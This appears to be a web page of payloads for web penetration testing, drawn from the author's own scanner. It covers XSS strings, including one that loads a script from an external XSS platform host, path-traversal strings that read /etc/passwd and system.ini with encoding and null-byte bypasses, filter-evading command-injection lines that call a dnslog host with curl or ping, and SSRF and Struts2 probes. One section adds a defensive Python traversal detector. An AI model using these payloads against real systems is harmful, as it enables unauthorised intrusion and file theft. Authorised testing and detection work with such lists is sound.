Common payloads for web penetration testing

A collection of payloads commonly used when testing for web vulnerabilities: the payload set from a sqlmap-style web vulnerability testing tool I wrote, compiled here for reference during testing.

[Reflected XSS]

[Formed in HTML]
  1. "'>
  2. [random]";>

[Formed in JS]
  1. document.title= "[random]"; //
  2. ; document.title= "[random]"; //
  3. ";document.title="[random] ";
  4. ';document.title="[random] ";
  5. "); document.title= "[random]";
  6. ');document.title="[random]";


[Formed in an HTML attribute (img)]
  1. 888 " onload=document.title="[random] " a="
  2. 888 ' onload=document.title="[random]" a='
  3. 888 onload= document.title= "[random]"

[Stored XSS]
[Generic payloads]

In a test environment, check how the payload is rendered at the point where it fires.

  1. [Bypass on Event] [event-handler bypass]
  2. # rich-text editors generally do not filter the img tag
  3. [Bypass pseudo protocol] [pseudo-protocol bypass]
  4. [Bypass html5 tag] [HTML5 tag bypass]
  5. [Bypass html or js encode] [JS encoding, HTML encoding, decimal encoding bypass, etc.]
  6. For blind testing, replace the JS trigger code with the address of your XSS platform
  7. "> <script src=http://myxss.net/xxxxxx></script>



[Static file read]
  1. [Standard checks]
  2. /../../../../../../../../../../../etc/passwd
  3. /../../../../../../../../../../../etc/hosts
  4. /../../../../../../../C:/Windows/system.ini [windows]
  5. [Obfuscation bypass]
  6. /././././././././././././././././././././././././../../../../../../../../etc/passwd
  7. /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  8. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  9. /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
  10. /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
  11. /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts


[Suffix bypass]
  1. /../../../../../../../../../../../etc/passwd #
  2. /../../../../../../../../../../../etc/passwd%00
  3. /../../../../../../../../../../../etc/passwd #.jpg
  4. /../../../../../../../../../../../etc/passwd%00.jpg
  5. /../../../../../../../../../../../etc/passwd #.html
  6. /../../../../../../../../../../../etc/passwd%00.html
  7. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #
  8. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #.jpg
  9. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #.html
  10. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg
  11. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html
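From the defender's side, the two lists above are useful as a test set for a traversal detector: every bypass variant (dot-slash padding, single and double percent-encoding, overlong UTF-8 %c0%ae, %00 and comment suffixes) has to canonicalize to the same `..` segments. The following is an added example, not code from the original page or the tool it describes; the overlong-UTF-8 mapping and the sample request paths are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Overlong UTF-8 forms that lenient decoders accept as "." and "/" (constructed mapping
# covering the %c0%ae form used in the list above plus the common slash variants).
OVERLONG = {"%c0%ae": ".", "%c0%af": "/", "%c1%9c": "/"}
SENSITIVE = re.compile(r"/(etc/(passwd|hosts)|windows/system\.ini)\b", re.IGNORECASE)


def canonicalize(raw: str, max_rounds: int = 3) -> str:
    """Map overlong forms, then percent-decode repeatedly (catches %252F double
    encoding) until the string stops changing; normalise backslashes to '/'."""
    s = raw
    for _ in range(max_rounds):
        step = s
        for enc, ch in OVERLONG.items():
            step = re.sub(re.escape(enc), ch, step, flags=re.IGNORECASE)
        step = unquote(step)
        if step == s:
            break
        s = step
    return s.replace("\\", "/")


def traversal_findings(raw: str) -> list:
    """Return the detection labels that apply to one request path (empty if clean)."""
    path = canonicalize(raw)
    findings = []
    if ".." in path.split("/"):          # any parent-directory segment after decoding
        findings.append("dot-dot-segment")
    if "\x00" in path:                   # %00 suffix trick (passwd%00.jpg)
        findings.append("null-byte")
    if SENSITIVE.search(path):           # targets named in the payload list
        findings.append("sensitive-target")
    if findings and path != raw.replace("\\", "/"):
        findings.append("obfuscated-encoding")   # traversal hidden behind encoding
    return findings


def scan(requests: list) -> dict:
    """Map each flagged request to its findings; clean requests are omitted."""
    result = {}
    for req in requests:
        findings = traversal_findings(req)
        if findings:
            result[req] = findings
    return result


SAMPLE_REQUESTS = [  # constructed access-log paths, not real traffic
    "/static/css/app.css",
    "/download?f=/../../../../../../../../../../../etc/passwd%00.jpg",
    "/view?file=/..%252F..%252F..%252Fetc%252Fpasswd",
    "/view?file=/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts",
    "/img?name=/./././../../../etc/passwd #.html",
    "/doc?p=/../../../../../../../C:/Windows/system.ini",
]

if __name__ == "__main__":
    for req, findings in scan(SAMPLE_REQUESTS).items():
        print(req, "->", ", ".join(findings))
```

Run it against your own access logs by feeding the request line's path-plus-query into `scan`; a hit on `sensitive-target` without `dot-dot-segment` usually means the application itself exposes the path and deserves a closer look.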


[Command execution vulnerability]
  1. [Standard checks]
  2. ;curl [random].test.dnslog.link
  3. | curl [random].test.dnslog.link
  4. | ping -n 2 [random].test.dnslog.link [Windows]
  5. | ping -c 2 [random].test.dnslog.link [Linux]
  6. [Bypass checks]
  7. ;curl [random].test.dnslog.link #
  8. | curl [random].test.dnslog.link #
  9. %20|%20curl%20[random].test.dnslog.link
  10. %20|%20curl%20[random].test.dnslog.link #
  11. %20|%20ping%20-n%202%20[random].test.dnslog.link
  12. %20|%20ping%20-c%202%20[random].test.dnslog.link #
  13. a=p;b=ing;c=c;d= 2;$a$b -$c $d [random].test.dnslog.link
  14. a=c;b=url;$a$b [random].test.dnslog.link #
  15. ${IFS}|${IFS}curl${IFS}[random].test.dnslog.link
  16. ${IFS}|${IFS}ping${IFS}-c${IFS} 2${IFS}[random].test.dnslog.link
  17. a=p;b=ing;c=c;d= 2;$a$b {IFS}-$c {IFS}$d {IFS}[random].test.dnslog.link
  18. a=c;b=url;$a$b {IFS}[random].test.dnslog.link #


[SSRF vulnerability]
http://[random].test.dnslog.link/


[Struts2 command execution]
?redirect:http://[random].test.dnslog.link/%25{3*4}
